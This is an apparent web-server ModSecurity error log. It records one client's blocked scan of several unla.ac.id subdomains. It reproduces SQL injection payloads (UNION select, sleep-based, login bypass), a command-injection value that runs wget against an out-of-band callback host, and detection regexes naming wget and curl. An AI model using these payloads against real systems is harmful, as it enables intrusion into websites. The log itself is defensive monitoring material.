[Tue Aug 29 11:30:22.352571 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/devices.inc.php"] [unique_id "ZO10XsCo-f0AAAPXAkMAAAAi"]
[Tue Aug 29 11:30:22.361493 2023] [:error] [pid 903] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/devices.inc.php"] [unique_id "ZO10XsCo-f0AAAOH4SEAAAAH"]
[Tue Aug 29 11:30:22.376308 2023] [:error] [pid 889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/devices.inc.php"] [unique_id "ZO10XsCo-f0AAAN5YIAAAAAN"]
[Tue Aug 29 11:30:22.486862 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ipAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ipAddress: `/bin/wget http:/cjmn8l5jmimk2adbbnlgfga85j6egs71t.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/Collector/diagnostics/ping"] [unique_id "ZO10XsCo-f0AAAPahu0AAAAL"]
[Tue Aug 29 11:30:22.519211 2023] [:error] [pid 904] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ipAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ipAddress: `/bin/wget http:/cjmn8l5jmimk2adbbnlgh5p1z6sc96swa.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/Collector/diagnostics/ping"] [unique_id "ZO10XsCo-f0AAAOIvTUAAAAM"]
[Tue Aug 29 11:30:22.631187 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ipAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ipAddress: `/bin/wget http:/cjmn8l5jmimk2adbbnlgtci446cof9g79.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/Collector/diagnostics/ping"] [unique_id "ZO10XsCo-f0AAAPahu8AAAAL"]
[Tue Aug 29 11:30:22.632289 2023] [:error] [pid 904] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ipAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ipAddress: `/bin/wget http:/cjmn8l5jmimk2adbbnlge8oo4gtoqg7hj.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/Collector/diagnostics/ping"] [unique_id "ZO10XsCo-f0AAAOIvTYAAAAM"]
[Tue Aug 29 11:30:22.684067 2023] [:error] [pid 966] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/devices.inc.php"] [unique_id "ZO10XsCo-f0AAAPGfroAAAAV"]
[Tue Aug 29 11:30:23.320515 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ipAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ipAddress: `/bin/wget http:/cjmn8l5jmimk2adbbnlgu4xjcfpu8r37i.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/Collector/diagnostics/ping"] [unique_id "ZO10X8Co-f0AAAPPSuQAAAAd"]
[Tue Aug 29 11:30:23.324498 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:email: 1' or sleep(6)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/forgot_password.php"] [unique_id "ZO10X8Co-f0AAAPMl@wAAAAY"]
[Tue Aug 29 11:30:23.327261 2023] [:error] [pid 966] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/account/index.php"] [unique_id "ZO10X8Co-f0AAAPGfrsAAAAV"]
[Tue Aug 29 11:30:23.339810 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:email: 1' or sleep(6)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/forgot_password.php"] [unique_id "ZO10X8Co-f0AAAPPSuUAAAAd"]
[Tue Aug 29 11:30:23.348413 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:email: 1' or sleep(6)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/forgot_password.php"] [unique_id "ZO10X8Co-f0AAAPMl@0AAAAY"]
[Tue Aug 29 11:30:23.348655 2023] [:error] [pid 904] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/account/index.php"] [unique_id "ZO10X8Co-f0AAAOIvTgAAAAM"]
[Tue Aug 29 11:30:23.348837 2023] [:error] [pid 966] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/account/index.php"] [unique_id "ZO10X8Co-f0AAAPGfrwAAAAV"]
[Tue Aug 29 11:30:23.350410 2023] [:error] [pid 964] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:email: 1' or sleep(6)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/forgot_password.php"] [unique_id "ZO10X8Co-f0AAAPENb8AAAAQ"]
[Tue Aug 29 11:30:23.351576 2023] [:error] [pid 902] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/account/index.php"] [unique_id "ZO10X8Co-f0AAAOGafYAAAAS"]
[Tue Aug 29 11:30:23.357936 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:email: 1' or sleep(6)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/forgot_password.php"] [unique_id "ZO10X8Co-f0AAAPXAkkAAAAi"]
[Tue Aug 29 11:30:23.361157 2023] [:error] [pid 889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/account/index.php"] [unique_id "ZO10X8Co-f0AAAN5YIQAAAAN"]
[Tue Aug 29 11:30:24.323583 2023] [:error] [pid 964] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/opensis/index.php"] [unique_id "ZO10YMCo-f0AAAPENcAAAAAQ"]
[Tue Aug 29 11:30:24.325206 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/opensis/index.php"] [unique_id "ZO10YMCo-f0AAAPXAkoAAAAi"]
[Tue Aug 29 11:30:24.337681 2023] [:error] [pid 966] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:email: 1' or sleep(6)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/forgot_password.php"] [unique_id "ZO10YMCo-f0AAAPGfr0AAAAV"]
[Tue Aug 29 11:30:24.339881 2023] [:error] [pid 867] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ipAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ipAddress: `/bin/wget http:/cjmn8l5jmimk2adbbnlgg6bofyxuoiegd.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/Collector/diagnostics/ping"] [unique_id "ZO10YMCo-f0AAANjpxIAAAAT"]
[Tue Aug 29 11:30:24.341694 2023] [:error] [pid 973] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:post_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:post_id: 1 AND (SELECT 1626 FROM (SELECT(SLEEP(6)))niPH)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10YMCo-f0AAAPNBRQAAAAZ"]
[Tue Aug 29 11:30:24.343187 2023] [:error] [pid 903] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:post_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:post_id: 1 AND (SELECT 1626 FROM (SELECT(SLEEP(6)))niPH)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10YMCo-f0AAAOH4SQAAAAH"]
[Tue Aug 29 11:30:24.348985 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/opensis/index.php"] [unique_id "ZO10YMCo-f0AAAPXAksAAAAi"]
[Tue Aug 29 11:30:24.351477 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:post_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:post_id: 1 AND (SELECT 1626 FROM (SELECT(SLEEP(6)))niPH)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10YMCo-f0AAAOOuTwAAAAW"]
[Tue Aug 29 11:30:24.352630 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/opensis/index.php"] [unique_id "ZO10YMCo-f0AAAOM4VkAAAAU"]
[Tue Aug 29 11:30:24.352843 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:post_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:post_id: 1 AND (SELECT 1626 FROM (SELECT(SLEEP(6)))niPH)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10YMCo-f0AAAPPSugAAAAd"]
[Tue Aug 29 11:30:24.375977 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/opensis/index.php"] [unique_id "ZO10YMCo-f0AAAOM4VoAAAAU"]
